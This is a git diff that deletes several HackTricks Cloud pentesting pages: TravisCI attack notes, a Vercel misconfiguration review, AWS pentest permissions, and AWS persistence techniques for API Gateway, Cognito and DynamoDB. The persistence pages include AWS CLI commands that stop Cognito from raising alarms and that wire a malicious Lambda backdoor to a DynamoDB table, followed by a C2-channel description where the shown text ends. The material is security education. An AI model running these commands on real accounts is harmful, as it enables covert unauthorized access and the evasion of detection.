-{% endhint %} - -## What is TravisCI - -**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**. - -{% content-ref url="basic-travisci-information.md" %} -[basic-travisci-information.md](basic-travisci-information.md) -{% endcontent-ref %} - -## Attacks - -### Triggers - -To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**: - -![](<../../.gitbook/assets/image (145).png>) - -#### Cron Jobs - -If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build: - -![](<../../.gitbook/assets/image (243).png>) - -{% hint style="info" %} -It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162). -{% endhint %} - -### Third Party PR - -TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: - -![](<../../.gitbook/assets/image (208).png>) - -### Dumping Secrets - -As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines). - -* To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build. -* To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**. 
-* To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as: - -![](<../../.gitbook/assets/image (81).png>) - -### TODO: - -* Example build with reverse shell running on Windows/Mac/Linux -* Example build leaking the env base64 encoded in the logs - -### TravisCI Enterprise - -If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to: - -* escape to the host? -* compromise kubernetes? -* compromise other machines running in the same network? -* compromise new cloud credentials? - -## References - -* [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/) -* [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/vercel-security.md b/pentesting-ci-cd/vercel-security.md deleted file mode 100644 index f46ad4fb1..000000000 --- a/pentesting-ci-cd/vercel-security.md +++ /dev/null @@ -1,463 +0,0 @@ -# Vercel - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**. - -For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also). - -## Project Settings - -### General - -**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations. - -#### Security Configurations: - -* **Transfer** - * **Misconfiguration:** Allows to transfer the project to another team - * **Risk:** An attacker could steal the project -* **Delete Project** - * **Misconfiguration:** Allows to delete the project - * **Risk:** Delete the prject - -*** - -### Domains - -**Purpose:** Manage custom domains, DNS settings, and SSL configurations. - -#### Security Configurations: - -* **DNS Configuration Errors** - * **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers. - * **Risk:** Domain hijacking, traffic interception, and phishing attacks. -* **SSL/TLS Certificate Management** - * **Misconfiguration:** Using weak or expired SSL/TLS certificates. - * **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality. -* **DNSSEC Implementation** - * **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings. - * **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks. -* **Environment used per domain** - * **Misconfiguration:** Change the environment used by the domain in production. - * **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production. - -*** - -### Environments - -**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables. 
- -#### Security Configurations: - -* **Environment Isolation** - * **Misconfiguration:** Sharing environment variables across environments. - * **Risk:** Leakage of production secrets into development or preview environments, increasing exposure. -* **Access to Sensitive Environments** - * **Misconfiguration:** Allowing broad access to production environments. - * **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches. - -*** - -### Environment Variables - -**Purpose:** Manage environment-specific variables and secrets used by the application. - -#### Security Configurations: - -* **Exposing Sensitive Variables** - * **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - * **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -* **Sensitive disabled** - * **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. -* **Shared Environment Variables** - * **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. - -*** - -### Git - -**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers. - -#### Security Configurations: - -* **Ignored Build Step (TODO)** - * **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE. - * **Risk:** TBD - -*** - -### Integrations - -**Purpose:** Connect third-party services and tools to enhance project functionalities. 
- -#### Security Configurations: - -* **Insecure Third-Party Integrations** - * **Misconfiguration:** Integrating with untrusted or insecure third-party services. - * **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations. -* **Over-Permissioned Integrations** - * **Misconfiguration:** Granting excessive permissions to integrated services. - * **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions. -* **Lack of Integration Monitoring** - * **Misconfiguration:** Failing to monitor and audit third-party integrations. - * **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches. - -*** - -### Deployment Protection - -**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments. - -#### Security Configurations: - -**Vercel Authentication** - -* **Misconfiguration:** Disabling authentication or not enforcing team member checks. -* **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse. - -**Protection Bypass for Automation** - -* **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets. -* **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments. - -**Shareable Links** - -* **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links. -* **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions. - -**OPTIONS Allowlist** - -* **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints. -* **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks. - -**Password Protection** - -* **Misconfiguration:** Using weak passwords or sharing them insecurely. 
-* **Risk:** Unauthorized access to deployments if passwords are guessed or leaked. -* **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. - -**Deployment Protection Exceptions** - -* **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently. -* **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access. -* **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. - -**Trusted IPs** - -* **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges. -* **Risk:** Legitimate users being blocked or unauthorized IPs gaining access. -* **Note:** Available on the **Enterprise** plan. - -*** - -### Functions - -**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies. - -#### Security Configurations: - -* **Nothing** - -*** - -### Data Cache - -**Purpose:** Manage caching strategies and settings to optimize performance and control data storage. - -#### Security Configurations: - -* **Purge Cache** - * **Misconfiguration:** It allows to delete all the cache. - * **Risk:** Unauthorized users deleting the cache leading to a potential DoS. - -*** - -### Cron Jobs - -**Purpose:** Schedule automated tasks and scripts to run at specified intervals. - -#### Security Configurations: - -* **Disable Cron Job** - * **Misconfiguration:** It allows to disable cron jobs declared inside the code - * **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for) - -*** - -### Log Drains - -**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing. 
- -#### Security Configurations: - -* Nothing (managed from teams settings) - -*** - -### Security - -**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more. - -#### Security Configurations: - -**Build Logs and Source Protection** - -* **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly. -* **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities. - -**Git Fork Protection** - -* **Misconfiguration:** Allowing unauthorized pull requests without proper reviews. -* **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors. - -**Secure Backend Access with OIDC Federation** - -* **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs. -* **Risk:** Unauthorized access to backend services through flawed authentication flows. - -**Deployment Retention Policy** - -* **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention). -* **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments. - -**Recently Deleted Deployments** - -* **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions. -* **Risk:** Loss of critical deployment history, hindering audits and rollbacks. - -*** - -### Advanced - -**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security. - -#### Security Configurations: - -**Directory Listing** - -* **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file. -* **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks. 
- -*** - -## Project Firewall - -### Firewall - -#### Security Configurations: - -**Enable Attack Challenge Mode** - -* **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability -* **Risk:** Potential user experience problems. - -### Custom Rules & IP Blocking - -* **Misconfiguration:** Allows to unblock/block traffic -* **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic - -*** - -## Project Deployment - -### Source - -* **Misconfiguration:** Allows access to read the complete source code of the application -* **Risk:** Potential exposure of sensitive information - -### Skew Protection - -* **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other. -* **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future - -*** - -## Team Settings - -### General - -#### Security Configurations: - -* **Transfer** - * **Misconfiguration:** Allows to transfer all the projects to another team - * **Risk:** An attacker could steal the projects -* **Delete Project** - * **Misconfiguration:** Allows to delete the team with all the projects - * **Risk:** Delete the projects - -*** - -### Billing - -#### Security Configurations: - -* **Speed Insights Cost Limit** - * **Misconfiguration:** An attacker could increase this number - * **Risk:** Increased costs - -*** - -### Members - -#### Security Configurations: - -* **Add members** - * **Misconfiguration:** An attacker could maintain persitence inviting an account he control - * **Risk:** Attacker persistence -* **Roles** - * **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. 
Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) - * **Risk**: Increate the exposure of the Vercel Team - -*** - -### Access Groups - -An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects. - -**Potential Misconfigurations:** - -* **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions. -* **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation. -* **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended. -* **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions. -* **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps. - -*** - -### Log Drains - -#### Security Configurations: - -* **Log Drains to third parties:** - * **Misconfiguration:** An attacker could configure a Log Drain to steal the logs - * **Risk:** Partial persistence - -*** - -### Security & Privacy - -#### Security Configurations: - -* **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard. - * **Misconfiguration:** - * Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting. - * Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain. 
- * **Risks:** - * **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team. - * **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals. -* **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access. - * **Misconfiguration:** Not adding critical Git scopes to the protected list. -* **Risks:** - * **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization. - * **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team. -* **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system. - * **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled. - * **Risks:** - * **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members. - * **Data Breach:** Sensitive information like API keys and credentials could be leaked. -* **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members. - * **Misconfiguration:**\ - Granting access to audit logs to unauthorized team members. - * **Risks:** - * **Privacy Violations:** Exposure of sensitive user activities and data. - * **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. 
-* **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management. - * **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints. - * **Risk:** Maintain persistence -* **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains. - * **Misconfiguration:** Leaving IP address visibility enabled without necessity. - * **Risks:** - * **Privacy Violations:** Non-compliance with data protection regulations like GDPR. - * **Legal Repercussions:** Potential fines and penalties for mishandling personal data. -* **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing. - * **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic. - * **Risks:** - * **Service Denial to Legitimate Users:** Blocking access for valid users or partners. - * **Operational Disruptions:** Loss of service availability for certain regions or clients. - -*** - -### Secure Compute - -**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy. - -#### **Potential Misconfigurations and Risks** - -1. **Incorrect AWS Region Selection** - * **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region. - * **Risk:** Increased latency, potential data residency compliance issues, and degraded performance. -2. 
**Overlapping CIDR Blocks** - * **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks. - * **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks. -3. **Improper VPC Peering Configuration** - * **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates). - * **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches. -4. **Excessive Project Assignments** - * **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation. - * **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others. -5. **Inadequate IP Address Management** - * **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately. - * **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities. -6. **Including Build Containers Unnecessarily** - * **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds. - * **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources. -7. **Failure to Securely Handle Bypass Secrets** - * **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections. - * **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code. -8. **Ignoring Region Failover Configurations** - * **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings. - * **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency. -9. 
**Exceeding VPC Peering Connection Limits** - * **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections). - * **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions. -10. **Insecure Network Settings** - * **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network. - * **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks. - -*** - -### Environment Variables - -**Purpose:** Manage environment-specific variables and secrets used by all the projects. - -#### Security Configurations: - -* **Exposing Sensitive Variables** - * **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - * **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -* **Sensitive disabled** - * **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md deleted file mode 100644 index 868bfe63a..000000000 --- a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md +++ /dev/null @@ -1,43 +0,0 @@ -# AWS - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: - -* The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) -* To run [aws\_iam\_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions: - * **access-analyzer:List\*** - * **access-analyzer:Get\*** - * **iam:CreateServiceLinkedRole** - * **access-analyzer:CreateAnalyzer** - * Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission) - * **access-analyzer:DeleteAnalyzer** - * Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md deleted file mode 100644 index eeeaca42b..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md +++ /dev/null @@ -1,58 +0,0 @@ -# AWS - API Gateway Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## API Gateway - -For more information go to: - -{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} -[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) -{% endcontent-ref %} - -### Resource Policy - -Modify the resource policy of the API gateway(s) to grant yourself access to them - -### Modify Lambda Authorizers - -Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ -Or just remove the use of the authorizer. - -### IAM Permissions - -If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ -Or just remove the use of the authorizer. - -### API Keys - -If API keys are used, you could leak them to maintain persistence or even create new ones.\ -Or just remove the use of API keys. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md deleted file mode 100644 index ce324c3a2..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - Cognito Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cognito - -For more information, access: - -{% content-ref url="../aws-services/aws-cognito-enum/" %} -[aws-cognito-enum](../aws-services/aws-cognito-enum/) -{% endcontent-ref %} - -### User persistence - -Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: - -* **Adding a User Pool** controlled by the user to an Identity Pool -* Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** - * Or to an **authenticated Identity Pool** if the attacker can login - * Or **improve the permissions** of the given roles -* **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** -* **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool - -Check how to do these actions in - -{% content-ref url="../aws-privilege-escalation/aws-cognito-privesc.md" %} -[aws-cognito-privesc.md](../aws-privilege-escalation/aws-cognito-privesc.md) -{% endcontent-ref %} - -### `cognito-idp:SetRiskConfiguration` - -An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: - -{% code overflow="wrap" %} -```bash -aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} -``` -{% endcode %} - -By default this is disabled: - -
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md deleted file mode 100644 index c8ddc156e..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md +++ /dev/null @@ -1,91 +0,0 @@ -# AWS - DynamoDB Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### DynamoDB - -For more information access: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -### DynamoDB Triggers with Lambda Backdoor - -Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. - -{% code overflow="wrap" %} -```bash -# Create a malicious Lambda function -aws lambda create-function \ - --function-name MaliciousFunction \ - --runtime nodejs14.x \ - --role \ - --handler index.handler \ - --zip-file fileb://malicious_function.zip \ - --region - -# Associate the Lambda function with the DynamoDB table as a trigger -aws dynamodbstreams describe-stream \ - --table-name TargetTable \ - --region - -# Note the "StreamArn" from the output -aws lambda create-event-source-mapping \ - --function-name MaliciousFunction \ - --event-source \ - --region -``` -{% endcode %} - -To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. - -### DynamoDB as a C2 Channel - -An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. 
